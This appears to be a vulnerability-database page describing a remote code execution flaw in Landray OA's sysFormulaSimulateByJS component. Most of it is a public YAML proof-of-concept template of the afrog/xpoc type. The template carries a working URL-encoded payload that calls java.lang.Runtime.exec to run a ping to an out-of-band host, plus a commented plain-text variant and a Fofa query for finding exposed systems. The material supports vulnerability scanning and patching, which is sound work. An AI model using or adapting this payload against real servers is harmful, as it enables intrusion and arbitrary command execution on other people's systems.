landray-oa-datajson-rce: Landray OA Datajson RCE

日期: 2025-09-01 | 影响软件: Landray OA | POC: 已公开

漏洞描述

Landray Office Automation (OA) software, specifically in the "s_bean" component's "sysFormulaSimulateByJS" functionality. This vulnerability allows remote code execution (RCE), enabling attackers to execute arbitrary code on a target system. Fofa: app="Landray-OA系统"

PoC代码[已公开]

id: landray-oa-datajson-rce

info:
  name: Landray OA Datajson RCE
  author: xpoc
  severity: critical
  verified: true
  description: |
    Landray Office Automation (OA) software, specifically in the "s_bean" component's "sysFormulaSimulateByJS" functionality. This vulnerability allows remote code execution (RCE), enabling attackers to execute arbitrary code on a target system.
    Fofa: app="Landray-OA系统"
  reference:
    - https://github.com/k3sc/Landray-oa-rce-1/blob/main/poc.py
    - https://github.com/hktalent/scan4all/blob/main/pocs_go/landray/Landray_RCE.go
    - https://github.com/zan8in/afrog/v3/blob/main/v2/pocs/afrog-pocs/vulnerability/landray-oa-datajson-rce.yaml
  tags: landray,rce
  created: 2023/06/22

set:
  oob: oob()
  oobHTTP: oob.HTTP
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: GET
      path: /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20{{oobDNS}}%22%29&type=1
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
  # r2:
  #   request:
  #     method: GET
  #     path: /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function test(){ return java.lang.Runtime};r=test();r.getRuntime().exec("ping {{oobDNS}}")&type=1
  #   expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0() # || r2()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/landray-oa-datajson-rce.yaml

相关漏洞推荐